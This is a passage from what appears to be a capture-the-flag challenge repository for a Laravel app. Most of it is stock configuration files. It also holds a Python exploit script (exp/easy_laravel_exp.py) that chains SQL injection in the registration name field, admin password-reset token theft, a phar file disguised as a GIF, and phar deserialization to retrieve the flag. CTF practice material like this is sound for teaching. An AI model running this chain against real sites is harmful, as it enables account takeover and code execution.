service which will provide reliable deliveries. 29 | | 30 | */ 31 | 32 | 'host' => env('MAIL_HOST', 'smtp.mailgun.org'), 33 | 34 | /* 35 | |-------------------------------------------------------------------------- 36 | | SMTP Host Port 37 | |-------------------------------------------------------------------------- 38 | | 39 | | This is the SMTP port used by your application to deliver e-mails to 40 | | users of the application. Like the host we have set this value to 41 | | stay compatible with the Mailgun e-mail application by default. 42 | | 43 | */ 44 | 45 | 'port' => env('MAIL_PORT', 587), 46 | 47 | /* 48 | |-------------------------------------------------------------------------- 49 | | Global "From" Address 50 | |-------------------------------------------------------------------------- 51 | | 52 | | You may wish for all e-mails sent by your application to be sent from 53 | | the same address. Here, you may specify a name and address that is 54 | | used globally for all e-mails that are sent by your application. 55 | | 56 | */ 57 | 58 | 'from' => [ 59 | 'address' => 'mail@qvq.im', 60 | 'name' => '4uuu Nya', 61 | ], 62 | 63 | /* 64 | |-------------------------------------------------------------------------- 65 | | E-Mail Encryption Protocol 66 | |-------------------------------------------------------------------------- 67 | | 68 | | Here you may specify the encryption protocol that should be used when 69 | | the application send e-mail messages. A sensible default using the 70 | | transport layer security protocol should provide great security. 71 | | 72 | */ 73 | 74 | 'encryption' => env('MAIL_ENCRYPTION', 'tls'), 75 | 76 | /* 77 | |-------------------------------------------------------------------------- 78 | | SMTP Server Username 79 | |-------------------------------------------------------------------------- 80 | | 81 | | If your SMTP server requires a username for authentication, you should 82 | | set it here. This will get used to authenticate with your server on 83 | | connection. You may also set the "password" value below this one. 84 | | 85 | */ 86 | 87 | 'username' => env('MAIL_USERNAME'), 88 | 89 | /* 90 | |-------------------------------------------------------------------------- 91 | | SMTP Server Password 92 | |-------------------------------------------------------------------------- 93 | | 94 | | Here you may set the password required by your SMTP server to send out 95 | | messages from your application. This will be given to the server on 96 | | connection so that the application will be able to send messages. 97 | | 98 | */ 99 | 100 | 'password' => env('MAIL_PASSWORD'), 101 | 102 | /* 103 | |-------------------------------------------------------------------------- 104 | | Sendmail System Path 105 | |-------------------------------------------------------------------------- 106 | | 107 | | When using the "sendmail" driver to send e-mails, we will need to know 108 | | the path to where Sendmail lives on this server. A default path has 109 | | been provided here, which will work well on most of your systems. 110 | | 111 | */ 112 | 113 | 'sendmail' => '/usr/sbin/sendmail -bs', 114 | 115 | ]; 116 | -------------------------------------------------------------------------------- /exp/easy_laravel_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | """ 4 | Author : Virink 5 | Date : 2018-10-15 21:39:25 6 | """ 7 | import requests 8 | import random 9 | import time 10 | import string 11 | import re 12 | 13 | req = requests.Session() 14 | 15 | URL = 'http://127.0.0.1:8081' 16 | 17 | 18 | def randstr(n=10): 19 | return ''.join([str(random.choice(string.ascii_lowercase)) for i in range(n)]) 20 | 21 | 22 | def get_csrf_token(url): 23 | res = req.get(URL+url) 24 | if res.status_code == 200: 25 | html = res.content.decode('utf-8') 26 | m = re.findall(r'', html) 27 | if m and len(m) > 0: 28 | csrftoken = m[0] 29 | return csrftoken 30 | print("[-] Request CSRT Error") 31 | return False 32 | 33 | 34 | def req_reset(email='admin@qvq.im'): 35 | csrftoken = get_csrf_token('/password/reset') 36 | if not csrftoken: 37 | return False 38 | data = { 39 | "_token": csrftoken, 40 | "email": email 41 | } 42 | res = None 43 | try: 44 | res = req.post(URL+'/password/email', data=data, timeout=1) 45 | if res.status_code == 200 or res.status_code == 500: 46 | print("[+] Request Reset Admin ") 47 | return True 48 | except: 49 | # server not set email server, then return 500 50 | print("[+] !Request Reset Admin ") 51 | return True 52 | else: 53 | print("[-] Request Reset Error") 54 | 55 | 56 | def reg_notes_token(): 57 | name = "virink' union select 1,token,3,4,5 from password_resets order by created_at desc limit 1-- -" 58 | email = "e%s@vvv.vvv" % randstr() 59 | csrftoken = get_csrf_token('/register') 60 | if not csrftoken: 61 | return False 62 | data = { 63 | "_token": csrftoken, 64 | "name": name, 65 | "email": email, 66 | "password": "password", 67 | "password_confirmation": "password" 68 | } 69 | # Register 70 | res = req.post(URL+'/register', data=data) 71 | if res.status_code == 200: 72 | print("[+] Register [%s] success" % email) 73 | # Note 74 | res = req.get(URL+'/note') 75 | if res.status_code == 200: 76 | html = res.content.decode('utf-8') 77 | m = re.findall(r'([a-f0-9]{64})', html) 78 | if m and len(m) > 0: 79 | print("[+] Reset Token : %s" % m[0]) 80 | return m[0] 81 | else: 82 | print("[-] Reset Token Error") 83 | else: 84 | print("[-] Get Note error") 85 | else: 86 | print("[-] Register error") 87 | return False 88 | 89 | 90 | def reset_passwd(token, passwd='123456', email='admin@qvq.im'): 91 | csrftoken = get_csrf_token('/password/reset/%s' % token) 92 | if csrftoken: 93 | data = { 94 | "_token": csrftoken, 95 | "token": token, 96 | "email": email, 97 | "password": "password", 98 | "password_confirmation": "password" 99 | } 100 | res = req.post(URL+'/password/reset', data=data) 101 | if res.status_code == 200: 102 | print("[+] Reset Passwd success") 103 | return True 104 | else: 105 | print("[-] Reset Passwd Error") 106 | 107 | 108 | def upload(uploadfile='easy_laravel_exp.phar'): 109 | csrftoken = get_csrf_token('/upload') 110 | filename = randstr()+'.gif' 111 | if csrftoken: 112 | data = { 113 | "_token": csrftoken 114 | } 115 | files = { 116 | "file": (filename, open(uploadfile, 'rb').read(), 'application/octet-stream'), 117 | } 118 | res = req.post(URL+'/upload', data=data, files=files) 119 | if res.status_code == 200: 120 | print("[+] Upload exp gif success") 121 | return filename 122 | return False 123 | 124 | 125 | def checkfile(filename='easy_laravel_exp.gif'): 126 | csrftoken = get_csrf_token('/files') 127 | if csrftoken: 128 | data = { 129 | "_token": csrftoken, 130 | "filename": "/%s/v.txt" % filename, 131 | } 132 | res = req.post( 133 | URL+'/check?path=phar://../storage/app/public', data=data) 134 | if res.status_code == 200: 135 | print("[+] Check File success") 136 | return True 137 | print("[-] Check File Error") 138 | 139 | 140 | def getflag(): 141 | res = req.get(URL+'/flag') 142 | if res.status_code == 200: 143 | html = res.content.decode('utf-8') 144 | flag = html[html.find('
')+34:-225] 145 | return flag.strip() 146 | 147 | 148 | if __name__ == '__main__': 149 | if req_reset(): 150 | token = reg_notes_token() 151 | print("[+] %s/password/reset/%s" % (URL, token)) 152 | req = requests.Session() 153 | if token: 154 | if reset_passwd(token): 155 | flag = getflag() 156 | print("[-] Get Flag Before: \033[91m%s\033[0m" % flag) 157 | fn = upload() 158 | if fn: 159 | if checkfile(fn): 160 | flag = getflag() 161 | print("[!!!] Get Flag : \033[91m%s\033[0m" % flag) 162 | -------------------------------------------------------------------------------- /easy_laravel/resources/lang/en/validation.php: -------------------------------------------------------------------------------- 1 | 'The :attribute must be accepted.', 17 | 'active_url' => 'The :attribute is not a valid URL.', 18 | 'after' => 'The :attribute must be a date after :date.', 19 | 'alpha' => 'The :attribute may only contain letters.', 20 | 'alpha_dash' => 'The :attribute may only contain letters, numbers, and dashes.', 21 | 'alpha_num' => 'The :attribute may only contain letters and numbers.', 22 | 'array' => 'The :attribute must be an array.', 23 | 'before' => 'The :attribute must be a date before :date.', 24 | 'between' => [ 25 | 'numeric' => 'The :attribute must be between :min and :max.', 26 | 'file' => 'The :attribute must be between :min and :max kilobytes.', 27 | 'string' => 'The :attribute must be between :min and :max characters.', 28 | 'array' => 'The :attribute must have between :min and :max items.', 29 | ], 30 | 'boolean' => 'The :attribute field must be true or false.', 31 | 'confirmed' => 'The :attribute confirmation does not match.', 32 | 'date' => 'The :attribute is not a valid date.', 33 | 'date_format' => 'The :attribute does not match the format :format.', 34 | 'different' => 'The :attribute and :other must be different.', 35 | 'digits' => 'The :attribute must be :digits digits.', 36 | 'digits_between' => 'The :attribute must be between :min and :max digits.', 37 | 'dimensions' => 'The :attribute has invalid image dimensions.', 38 | 'distinct' => 'The :attribute field has a duplicate value.', 39 | 'email' => 'The :attribute must be a valid email address.', 40 | 'exists' => 'The selected :attribute is invalid.', 41 | 'file' => 'The :attribute must be a file.', 42 | 'filled' => 'The :attribute field is required.', 43 | 'image' => 'The :attribute must be an image.', 44 | 'in' => 'The selected :attribute is invalid.', 45 | 'in_array' => 'The :attribute field does not exist in :other.', 46 | 'integer' => 'The :attribute must be an integer.', 47 | 'ip' => 'The :attribute must be a valid IP address.', 48 | 'json' => 'The :attribute must be a valid JSON string.', 49 | 'max' => [ 50 | 'numeric' => 'The :attribute may not be greater than :max.', 51 | 'file' => 'The :attribute may not be greater than :max kilobytes.', 52 | 'string' => 'The :attribute may not be greater than :max characters.', 53 | 'array' => 'The :attribute may not have more than :max items.', 54 | ], 55 | 'mimes' => 'The :attribute must be a file of type: :values.', 56 | 'min' => [ 57 | 'numeric' => 'The :attribute must be at least :min.', 58 | 'file' => 'The :attribute must be at least :min kilobytes.', 59 | 'string' => 'The :attribute must be at least :min characters.', 60 | 'array' => 'The :attribute must have at least :min items.', 61 | ], 62 | 'not_in' => 'The selected :attribute is invalid.', 63 | 'numeric' => 'The :attribute must be a number.', 64 | 'present' => 'The :attribute field must be present.', 65 | 'regex' => 'The :attribute format is invalid.', 66 | 'required' => 'The :attribute field is required.', 67 | 'required_if' => 'The :attribute field is required when :other is :value.', 68 | 'required_unless' => 'The :attribute field is required unless :other is in :values.', 69 | 'required_with' => 'The :attribute field is required when :values is present.', 70 | 'required_with_all' => 'The :attribute field is required when :values is present.', 71 | 'required_without' => 'The :attribute field is required when :values is not present.', 72 | 'required_without_all' => 'The :attribute field is required when none of :values are present.', 73 | 'same' => 'The :attribute and :other must match.', 74 | 'size' => [ 75 | 'numeric' => 'The :attribute must be :size.', 76 | 'file' => 'The :attribute must be :size kilobytes.', 77 | 'string' => 'The :attribute must be :size characters.', 78 | 'array' => 'The :attribute must contain :size items.', 79 | ], 80 | 'string' => 'The :attribute must be a string.', 81 | 'timezone' => 'The :attribute must be a valid zone.', 82 | 'unique' => 'The :attribute has already been taken.', 83 | 'url' => 'The :attribute format is invalid.', 84 | 85 | /* 86 | |-------------------------------------------------------------------------- 87 | | Custom Validation Language Lines 88 | |-------------------------------------------------------------------------- 89 | | 90 | | Here you may specify custom validation messages for attributes using the 91 | | convention "attribute.rule" to name the lines. This makes it quick to 92 | | specify a specific custom language line for a given attribute rule. 93 | | 94 | */ 95 | 96 | 'custom' => [ 97 | 'attribute-name' => [ 98 | 'rule-name' => 'custom-message', 99 | ], 100 | ], 101 | 102 | /* 103 | |-------------------------------------------------------------------------- 104 | | Custom Validation Attributes 105 | |-------------------------------------------------------------------------- 106 | | 107 | | The following language lines are used to swap attribute place-holders 108 | | with something more reader friendly such as E-Mail Address instead 109 | | of "email". This simply helps us make messages a little cleaner. 110 | | 111 | */ 112 | 113 | 'attributes' => [], 114 | 115 | ]; 116 | -------------------------------------------------------------------------------- /easy_laravel/config/session.php: -------------------------------------------------------------------------------- 1 | env('SESSION_DRIVER', 'file'), 20 | 21 | /* 22 | |-------------------------------------------------------------------------- 23 | | Session Lifetime 24 | |-------------------------------------------------------------------------- 25 | | 26 | | Here you may specify the number of minutes that you wish the session 27 | | to be allowed to remain idle before it expires. If you want them 28 | | to immediately expire on the browser closing, set that option. 29 | | 30 | */ 31 | 32 | 'lifetime' => 120, 33 | 34 | 'expire_on_close' => false, 35 | 36 | /* 37 | |-------------------------------------------------------------------------- 38 | | Session Encryption 39 | |-------------------------------------------------------------------------- 40 | | 41 | | This option allows you to easily specify that all of your session data 42 | | should be encrypted before it is stored. All encryption will be run 43 | | automatically by Laravel and you can use the Session like normal. 44 | | 45 | */ 46 | 47 | 'encrypt' => false, 48 | 49 | /* 50 | |-------------------------------------------------------------------------- 51 | | Session File Location 52 | |-------------------------------------------------------------------------- 53 | | 54 | | When using the native session driver, we need a location where session 55 | | files may be stored. A default has been set for you but a different 56 | | location may be specified. This is only needed for file sessions. 57 | | 58 | */ 59 | 60 | 'files' => storage_path('framework/sessions'), 61 | 62 | /* 63 | |-------------------------------------------------------------------------- 64 | | Session Database Connection 65 | |-------------------------------------------------------------------------- 66 | | 67 | | When using the "database" or "redis" session drivers, you may specify a 68 | | connection that should be used to manage these sessions. This should 69 | | correspond to a connection in your database configuration options. 70 | | 71 | */ 72 | 73 | 'connection' => null, 74 | 75 | /* 76 | |-------------------------------------------------------------------------- 77 | | Session Database Table 78 | |-------------------------------------------------------------------------- 79 | | 80 | | When using the "database" session driver, you may specify the table we 81 | | should use to manage the sessions. Of course, a sensible default is 82 | | provided for you; however, you are free to change this as needed. 83 | | 84 | */ 85 | 86 | 'table' => 'sessions', 87 | 88 | /* 89 | |-------------------------------------------------------------------------- 90 | | Session Cache Store 91 | |-------------------------------------------------------------------------- 92 | | 93 | | When using the "apc" or "memcached" session drivers, you may specify a 94 | | cache store that should be used for these sessions. This value must 95 | | correspond with one of the application's configured cache stores. 96 | | 97 | */ 98 | 99 | 'store' => null, 100 | 101 | /* 102 | |-------------------------------------------------------------------------- 103 | | Session Sweeping Lottery 104 | |-------------------------------------------------------------------------- 105 | | 106 | | Some session drivers must manually sweep their storage location to get 107 | | rid of old sessions from storage. Here are the chances that it will 108 | | happen on a given request. By default, the odds are 2 out of 100. 109 | | 110 | */ 111 | 112 | 'lottery' => [2, 100], 113 | 114 | /* 115 | |-------------------------------------------------------------------------- 116 | | Session Cookie Name 117 | |-------------------------------------------------------------------------- 118 | | 119 | | Here you may change the name of the cookie used to identify a session 120 | | instance by ID. The name specified here will get used every time a 121 | | new session cookie is created by the framework for every driver. 122 | | 123 | */ 124 | 125 | 'cookie' => 'laravel_session', 126 | 127 | /* 128 | |-------------------------------------------------------------------------- 129 | | Session Cookie Path 130 | |-------------------------------------------------------------------------- 131 | | 132 | | The session cookie path determines the path for which the cookie will 133 | | be regarded as available. Typically, this will be the root path of 134 | | your application but you are free to change this when necessary. 135 | | 136 | */ 137 | 138 | 'path' => '/', 139 | 140 | /* 141 | |-------------------------------------------------------------------------- 142 | | Session Cookie Domain 143 | |-------------------------------------------------------------------------- 144 | | 145 | | Here you may change the domain of the cookie used to identify a session 146 | | in your application. This will determine which domains the cookie is 147 | | available to in your application. A sensible default has been set. 148 | | 149 | */ 150 | 151 | 'domain' => env('SESSION_DOMAIN', null), 152 | 153 | /* 154 | |-------------------------------------------------------------------------- 155 | | HTTPS Only Cookies 156 | |-------------------------------------------------------------------------- 157 | | 158 | | By setting this option to true, session cookies will only be sent back 159 | | to the server if the browser has a HTTPS connection. This will keep 160 | | the cookie from being sent to you if it can not be done securely. 161 | | 162 | */ 163 | 164 | 'secure' => false, 165 | 166 | /* 167 | |-------------------------------------------------------------------------- 168 | | HTTP Access Only 169 | |-------------------------------------------------------------------------- 170 | | 171 | | Setting this value to true will prevent JavaScript from accessing the 172 | | value of the cookie and the cookie will only be accessible through 173 | | the HTTP protocol. You are free to modify this option if needed. 174 | | 175 | */ 176 | 177 | 'http_only' => true, 178 | 179 | ]; 180 | -------------------------------------------------------------------------------- /easy_laravel/config/debugbar.php: -------------------------------------------------------------------------------- 1 | env('DEBUGBAR_ENABLED', null), 16 | 17 | /* 18 | |-------------------------------------------------------------------------- 19 | | Storage settings 20 | |-------------------------------------------------------------------------- 21 | | 22 | | DebugBar stores data for session/ajax requests. 23 | | You can disable this, so the debugbar stores data in headers/session, 24 | | but this can cause problems with large data collectors. 25 | | By default, file storage (in the storage folder) is used. Redis and PDO 26 | | can also be used. For PDO, run the package migrations first. 27 | | 28 | */ 29 | 'storage' => [ 30 | 'enabled' => true, 31 | 'driver' => 'file', // redis, file, pdo, custom 32 | 'path' => storage_path('debugbar'), // For file driver 33 | 'connection' => null, // Leave null for default connection (Redis/PDO) 34 | 'provider' => '' // Instance of StorageInterface for custom driver 35 | ], 36 | 37 | /* 38 | |-------------------------------------------------------------------------- 39 | | Vendors 40 | |-------------------------------------------------------------------------- 41 | | 42 | | Vendor files are included by default, but can be set to false. 43 | | This can also be set to 'js' or 'css', to only include javascript or css vendor files. 44 | | Vendor files are for css: font-awesome (including fonts) and highlight.js (css files) 45 | | and for js: jquery and and highlight.js 46 | | So if you want syntax highlighting, set it to true. 47 | | jQuery is set to not conflict with existing jQuery scripts. 48 | | 49 | */ 50 | 51 | 'include_vendors' => true, 52 | 53 | /* 54 | |-------------------------------------------------------------------------- 55 | | Capture Ajax Requests 56 | |-------------------------------------------------------------------------- 57 | | 58 | | The Debugbar can capture Ajax requests and display them. If you don't want this (ie. because of errors), 59 | | you can use this option to disable sending the data through the headers. 60 | | 61 | | Optionally, you can also send ServerTiming headers on ajax requests for the Chrome DevTools. 62 | */ 63 | 64 | 'capture_ajax' => true, 65 | 'add_ajax_timing' => false, 66 | 67 | /* 68 | |-------------------------------------------------------------------------- 69 | | Custom Error Handler for Deprecated warnings 70 | |-------------------------------------------------------------------------- 71 | | 72 | | When enabled, the Debugbar shows deprecated warnings for Symfony components 73 | | in the Messages tab. 74 | | 75 | */ 76 | 'error_handler' => false, 77 | 78 | /* 79 | |-------------------------------------------------------------------------- 80 | | Clockwork integration 81 | |-------------------------------------------------------------------------- 82 | | 83 | | The Debugbar can emulate the Clockwork headers, so you can use the Chrome 84 | | Extension, without the server-side code. It uses Debugbar collectors instead. 85 | | 86 | */ 87 | 'clockwork' => false, 88 | 89 | /* 90 | |-------------------------------------------------------------------------- 91 | | DataCollectors 92 | |-------------------------------------------------------------------------- 93 | | 94 | | Enable/disable DataCollectors 95 | | 96 | */ 97 | 98 | 'collectors' => [ 99 | 'phpinfo' => true, // Php version 100 | 'messages' => true, // Messages 101 | 'time' => true, // Time Datalogger 102 | 'memory' => true, // Memory usage 103 | 'exceptions' => true, // Exception displayer 104 | 'log' => true, // Logs from Monolog (merged in messages if enabled) 105 | 'db' => true, // Show database (PDO) queries and bindings 106 | 'views' => true, // Views with their data 107 | 'route' => true, // Current route information 108 | 'auth' => true, // Display Laravel authentication status 109 | 'gate' => true, // Display Laravel Gate checks 110 | 'session' => true, // Display session data 111 | 'symfony_request' => true, // Only one can be enabled.. 112 | 'mail' => true, // Catch mail messages 113 | 'laravel' => false, // Laravel version and environment 114 | 'events' => false, // All events fired 115 | 'default_request' => false, // Regular or special Symfony request logger 116 | 'logs' => false, // Add the latest log messages 117 | 'files' => false, // Show the included files 118 | 'config' => false, // Display config settings 119 | ], 120 | 121 | /* 122 | |-------------------------------------------------------------------------- 123 | | Extra options 124 | |-------------------------------------------------------------------------- 125 | | 126 | | Configure some DataCollectors 127 | | 128 | */ 129 | 130 | 'options' => [ 131 | 'auth' => [ 132 | 'show_name' => true, // Also show the users name/email in the debugbar 133 | ], 134 | 'db' => [ 135 | 'with_params' => true, // Render SQL with the parameters substituted 136 | 'backtrace' => true, // Use a backtrace to find the origin of the query in your files. 137 | 'timeline' => false, // Add the queries to the timeline 138 | 'explain' => [ // Show EXPLAIN output on queries 139 | 'enabled' => false, 140 | 'types' => ['SELECT'], // ['SELECT', 'INSERT', 'UPDATE', 'DELETE']; for MySQL 5.6.3+ 141 | ], 142 | 'hints' => true, // Show hints for common mistakes 143 | ], 144 | 'mail' => [ 145 | 'full_log' => false 146 | ], 147 | 'views' => [ 148 | 'data' => false, //Note: Can slow down the application, because the data can be quite large.. 149 | ], 150 | 'route' => [ 151 | 'label' => true // show complete route on bar 152 | ], 153 | 'logs' => [ 154 | 'file' => null 155 | ], 156 | ], 157 | 158 | /* 159 | |-------------------------------------------------------------------------- 160 | | Inject Debugbar in Response 161 | |-------------------------------------------------------------------------- 162 | | 163 | | Usually, the debugbar is added just before , by listening to the 164 | | Response after the App is done. If you disable this, you have to add them 165 | | in your template yourself. See http://phpdebugbar.com/docs/rendering.html 166 | | 167 | */ 168 | 169 | 'inject' => true, 170 | 171 | /* 172 | |-------------------------------------------------------------------------- 173 | | DebugBar route prefix 174 | |-------------------------------------------------------------------------- 175 | | 176 | | Sometimes you want to set route prefix to be used by DebugBar to load 177 | | its resources from. Usually the need comes from misconfigured web server or 178 | | from trying to overcome bugs like this: http://trac.nginx.org/nginx/ticket/97 179 | | 180 | */ 181 | 'route_prefix' => '_debugbar', 182 | 183 | /* 184 | |-------------------------------------------------------------------------- 185 | | DebugBar route domain 186 | |-------------------------------------------------------------------------- 187 | | 188 | | By default DebugBar route served from the same domain that request served. 189 | | To override default domain, specify it as a non-empty value. 190 | */ 191 | 'route_domain' => null, 192 | ]; 193 | -------------------------------------------------------------------------------- /easy_laravel/config/app.php: -------------------------------------------------------------------------------- 1 | 'Easy Laravel', 16 | 17 | /* 18 | |-------------------------------------------------------------------------- 19 | | Application Environment 20 | |-------------------------------------------------------------------------- 21 | | 22 | | This value determines the "environment" your application is currently 23 | | running in. This may determine how you prefer to configure various 24 | | services your application utilizes. Set this in your ".env" file. 25 | | 26 | */ 27 | 28 | 'env' => env('APP_ENV', 'production'), 29 | 30 | /* 31 | |-------------------------------------------------------------------------- 32 | | Application Debug Mode 33 | |-------------------------------------------------------------------------- 34 | | 35 | | When your application is in debug mode, detailed error messages with 36 | | stack traces will be shown on every error that occurs within your 37 | | application. If disabled, a simple generic error page is shown. 38 | | 39 | */ 40 | 41 | 'debug' => env('APP_DEBUG', false), 42 | 43 | /* 44 | |-------------------------------------------------------------------------- 45 | | Application URL 46 | |-------------------------------------------------------------------------- 47 | | 48 | | This URL is used by the console to properly generate URLs when using 49 | | the Artisan command line tool. You should set this to the root of 50 | | your application so that it is used when running Artisan tasks. 51 | | 52 | */ 53 | 54 | 'url' => env('APP_URL', 'http://localhost'), 55 | 56 | /* 57 | |-------------------------------------------------------------------------- 58 | | Application Timezone 59 | |-------------------------------------------------------------------------- 60 | | 61 | | Here you may specify the default timezone for your application, which 62 | | will be used by the PHP date and date-time functions. We have gone 63 | | ahead and set this to a sensible default for you out of the box. 64 | | 65 | */ 66 | 67 | 'timezone' => 'UTC', 68 | 69 | /* 70 | |-------------------------------------------------------------------------- 71 | | Application Locale Configuration 72 | |-------------------------------------------------------------------------- 73 | | 74 | | The application locale determines the default locale that will be used 75 | | by the translation service provider. You are free to set this value 76 | | to any of the locales which will be supported by the application. 77 | | 78 | */ 79 | 80 | 'locale' => 'en', 81 | 82 | /* 83 | |-------------------------------------------------------------------------- 84 | | Application Fallback Locale 85 | |-------------------------------------------------------------------------- 86 | | 87 | | The fallback locale determines the locale to use when the current one 88 | | is not available. You may change the value to correspond to any of 89 | | the language folders that are provided through your application. 90 | | 91 | */ 92 | 93 | 'fallback_locale' => 'en', 94 | 95 | /* 96 | |-------------------------------------------------------------------------- 97 | | Encryption Key 98 | |-------------------------------------------------------------------------- 99 | | 100 | | This key is used by the Illuminate encrypter service and should be set 101 | | to a random, 32 character string, otherwise these encrypted strings 102 | | will not be safe. Please do this before deploying an application! 103 | | 104 | */ 105 | 106 | 'key' => env('APP_KEY'), 107 | 108 | 'cipher' => 'AES-256-CBC', 109 | 110 | /* 111 | |-------------------------------------------------------------------------- 112 | | Logging Configuration 113 | |-------------------------------------------------------------------------- 114 | | 115 | | Here you may configure the log settings for your application. Out of 116 | | the box, Laravel uses the Monolog PHP logging library. This gives 117 | | you a variety of powerful log handlers / formatters to utilize. 118 | | 119 | | Available Settings: "single", "daily", "syslog", "errorlog" 120 | | 121 | */ 122 | 123 | 'log' => env('APP_LOG', 'single'), 124 | 125 | 'log_level' => env('APP_LOG_LEVEL', 'debug'), 126 | 127 | /* 128 | |-------------------------------------------------------------------------- 129 | | Autoloaded Service Providers 130 | |-------------------------------------------------------------------------- 131 | | 132 | | The service providers listed here will be automatically loaded on the 133 | | request to your application. Feel free to add your own services to 134 | | this array to grant expanded functionality to your applications. 135 | | 136 | */ 137 | 138 | 'providers' => [ 139 | 140 | /* 141 | * Laravel Framework Service Providers... 142 | */ 143 | Illuminate\Auth\AuthServiceProvider::class, 144 | Illuminate\Broadcasting\BroadcastServiceProvider::class, 145 | Illuminate\Bus\BusServiceProvider::class, 146 | Illuminate\Cache\CacheServiceProvider::class, 147 | Illuminate\Foundation\Providers\ConsoleSupportServiceProvider::class, 148 | Illuminate\Cookie\CookieServiceProvider::class, 149 | Illuminate\Database\DatabaseServiceProvider::class, 150 | Illuminate\Encryption\EncryptionServiceProvider::class, 151 | Illuminate\Filesystem\FilesystemServiceProvider::class, 152 | Illuminate\Foundation\Providers\FoundationServiceProvider::class, 153 | Illuminate\Hashing\HashServiceProvider::class, 154 | Illuminate\Mail\MailServiceProvider::class, 155 | Illuminate\Notifications\NotificationServiceProvider::class, 156 | Illuminate\Pagination\PaginationServiceProvider::class, 157 | Illuminate\Pipeline\PipelineServiceProvider::class, 158 | Illuminate\Queue\QueueServiceProvider::class, 159 | Illuminate\Redis\RedisServiceProvider::class, 160 | Illuminate\Auth\Passwords\PasswordResetServiceProvider::class, 161 | Illuminate\Session\SessionServiceProvider::class, 162 | Illuminate\Translation\TranslationServiceProvider::class, 163 | Illuminate\Validation\ValidationServiceProvider::class, 164 | Illuminate\View\ViewServiceProvider::class, 165 | 166 | /* 167 | * Package Service Providers... 168 | */ 169 | 170 | Laracasts\Flash\FlashServiceProvider::class, 171 | 172 | /* 173 | * Application Service Providers... 174 | */ 175 | App\Providers\AppServiceProvider::class, 176 | // App\Providers\BroadcastServiceProvider::class, 177 | App\Providers\AuthServiceProvider::class, 178 | App\Providers\EventServiceProvider::class, 179 | App\Providers\RouteServiceProvider::class, 180 | 181 | ], 182 | 183 | /* 184 | |-------------------------------------------------------------------------- 185 | | Class Aliases 186 | |-------------------------------------------------------------------------- 187 | | 188 | | This array of class aliases will be registered when this application 189 | | is started. However, feel free to register as many as you wish as 190 | | the aliases are "lazy" loaded so they don't hinder performance. 191 | | 192 | */ 193 | 194 | 'aliases' => [ 195 | 196 | 'App' => Illuminate\Support\Facades\App::class, 197 | 'Artisan' => Illuminate\Support\Facades\Artisan::class, 198 | 'Auth' => Illuminate\Support\Facades\Auth::class, 199 | 'Blade' => Illuminate\Support\Facades\Blade::class, 200 | 'Cache' => Illuminate\Support\Facades\Cache::class, 201 | 'Config' => Illuminate\Support\Facades\Config::class, 202 | 'Cookie' => Illuminate\Support\Facades\Cookie::class, 203 | 'Crypt' => Illuminate\Support\Facades\Crypt::class, 204 | 'DB' => Illuminate\Support\Facades\DB::class, 205 | 'Eloquent' => Illuminate\Database\Eloquent\Model::class, 206 | 'Event' => Illuminate\Support\Facades\Event::class, 207 | 'File' => Illuminate\Support\Facades\File::class, 208 | 'Gate' => Illuminate\Support\Facades\Gate::class, 209 | 'Hash' => Illuminate\Support\Facades\Hash::class, 210 | 'Lang' => Illuminate\Support\Facades\Lang::class, 211 | 'Log' => Illuminate\Support\Facades\Log::class, 212 | 'Mail' => Illuminate\Support\Facades\Mail::class, 213 | 'Notification' => Illuminate\Support\Facades\Notification::class, 214 | 'Password' => Illuminate\Support\Facades\Password::class, 215 | 'Queue' => Illuminate\Support\Facades\Queue::class, 216 | 'Redirect' => Illuminate\Support\Facades\Redirect::class, 217 | 'Redis' => Illuminate\Support\Facades\Redis::class, 218 | 'Request' => Illuminate\Support\Facades\Request::class, 219 | 'Response' => Illuminate\Support\Facades\Response::class, 220 | 'Route' => Illuminate\Support\Facades\Route::class, 221 | 'Schema' => Illuminate\Support\Facades\Schema::class, 222 | 'Session' => Illuminate\Support\Facades\Session::class, 223 | 'Storage' => Illuminate\Support\Facades\Storage::class, 224 | 'URL' => Illuminate\Support\Facades\URL::class, 225 | 'Validator' => Illuminate\Support\Facades\Validator::class, 226 | 'View' => Illuminate\Support\Facades\View::class, 227 | 'Flash' => Laracasts\Flash\Flash::class, 228 | 229 | ], 230 | 231 | ]; 232 | --------------------------------------------------------------------------------